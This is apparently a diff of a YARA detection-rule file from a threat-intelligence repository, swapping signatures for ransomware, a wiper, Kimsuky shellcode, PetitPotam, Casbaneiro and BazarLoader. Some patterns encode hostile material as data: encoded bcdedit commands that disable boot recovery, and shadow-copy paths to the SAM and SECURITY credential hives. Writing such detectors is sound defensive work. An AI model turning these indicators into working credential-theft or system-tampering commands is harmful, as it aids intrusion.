-		$seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff }
-		$seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff }
-		$seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 }
-		$s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide
-		$s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
-		$s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 }
-		$s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 }
-		$s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 }
+		$s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide
+		$s2 = "Windows\\System32\\config\\SECURITY" fullword wide
+		$s3 = "Windows\\System32\\config\\SYSTEM" fullword wide
+		$s4 = "Windows\\System32\\config\\SAM" fullword wide
+		$s5 = "SECURITY-" fullword wide
+		$s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a  }
+		$s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect RobbinHood ransomware"
+		description = "Detect PetitPotam exploit (local exploit version)"
 		author = "Arkbird_SOLG"
-		id = "adaacb06-0738-5d2b-b97e-b9007341f743"
-		date = "2020-11-04"
-		modified = "2020-11-05"
-		reference = "https://twitter.com/joakimkennedy/status/1323957238680178689"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20"
+		id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa"
+		date = "2021-07-23"
+		modified = "2021-07-24"
+		reference = "https://github.com/topotam/PetitPotam"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d"
+		logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d"
 		score = 75
-		quality = 67
+		quality = 69
 		tags = "FILE"
-		hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b"
-		hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501"
-		hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754"
+		hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d }
-		$com1 = "os/exec.(*Cmd).Run" fullword ascii
-		$com2 = "os/exec.(*Cmd).Start" fullword ascii
-		$com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 }
-		$str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 }
-		$str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a }
-		$str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d }
+		$s1 = "\\pipe\\lsarpc" fullword wide
+		$s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 }
+		$s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 }
+		$s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
+		$s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 }
+		$s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d }
+		$s7 = "Attack success!!!\n" fullword wide
+		$s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 }
+		$s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 }
+		$s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 600KB and $seq and 2 of ( $com* ) and 2 of ( $str* )
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE
+rule ARKBIRD_SOLG_Malware_Casbaneiro_MSI : FILE
 {
 	meta:
-		description = "Detect unknown wiper that focuses olympic games in Japan"
+		description = "Detect MSIPackage used by Casbaneiro"
 		author = "Arkbird_SOLG"
-		id = "a03d558e-399a-506e-8f37-d4907cc68d54"
-		date = "2021-07-22"
-		modified = "2021-07-22"
-		reference = "https://www.mbsd.jp/research/20210721/blog/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29"
+		id = "47a5ea47-f799-5467-a482-9816c0de3ecf"
+		date = "2020-06-05"
+		modified = "2020-06-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1268811438707159040"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-05/Casbaneiro/Casbaneiro_stealer.yar#L3-L22"
 		license_url = "N/A"
-		logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730"
+		logic_hash = "fa1c53268d51b4b34b4cf4cd84ddb43ffba1dfa8bbe73cd7506f5e31e970855b"
 		score = 75
-		quality = 40
+		quality = 71
 		tags = "FILE"
-		hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f"
-		hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390"
-		tlp = "green"
-		adversary = "Olympic Destroyer ?"
+		hash1 = "8e77a2e1d30600db01a8481d232b601581faee02b7ec44c1ad9d74ec3544ba7d"
 
 	strings:
-		$s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii
-		$s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 }
-		$s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f }
-		$s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 }
-		$s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 }
-		$s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 }
-		$p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f }
-		$p2 = "UPX" fullword ascii
-		$p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 }
-		$p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 }
-		$p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 }
-		$p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 }
-		$p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 }
-		$p8 = { 26 30 30 63 66 67 }
-		$p9 = { 72 6f 63 65 94 48 61 63 6b }
+		$x1 = "C:\\Branch\\win\\Release\\custact\\x86\\vmdetect.pdb" fullword ascii
+		$s2 = "C:\\Branch\\win\\Release\\custact\\\\x86\\AICustAct.pdb" fullword ascii
+		$s3 = ";!@Install@!UTF-8!\\nTitle=\"Mozilla Firefox\"\\nRunProgram=\"setup-stub.exe\"\\n;!@InstallEnd@!7z" fullword ascii
+		$s4 = "__MOZCUSTOM__:campaign%3D%2528not%2Bset%2529%26content%3D%2528not%2Bset%2529%26medium%3Dreferral%26source%3Dwww.google.com" fullword ascii
+		$s5 = "https://www.mozilla.com0\\r" fullword wide
+		$s6 = "__CxxFrameHandler" fullword ascii
+		$s7 = "release+certificates@mozilla.com" fullword ascii
+		$s8 = "setup-stub.exe" fullword ascii
+		$s9 = "7zS.sfx.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and ( 5 of ( $s* ) or 7 of ( $p* ) )
+		uint16( 0 ) == 0xd0cf and filesize > 100KB and 7 of them
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect Kimsuky shellcode used in fake PDF against South Korea"
+		description = "Detect BazarLoader implant"
 		author = "Arkbird_SOLG"
-		id = "0b8d514b-82b6-5106-a87a-0890be1850d5"
-		date = "2021-08-03"
-		modified = "2021-08-04"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23"
+		id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad"
+		date = "2021-10-30"
+		modified = "2021-10-30"
+		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a"
-		score = 50
+		logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e"
-		hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc"
-		hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e"
-		level = "Experimental"
+		hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94"
+		hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10"
 		tlp = "white"
-		adversary = "Kimsuky"
+		adversary = "-"
 
 	strings:
-		$x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d }
-		$s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 }
-		$s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb }
-		$s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f }
-		$s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c }
-		$s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 }
+		$s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 }
+		$s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 }
+		$s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 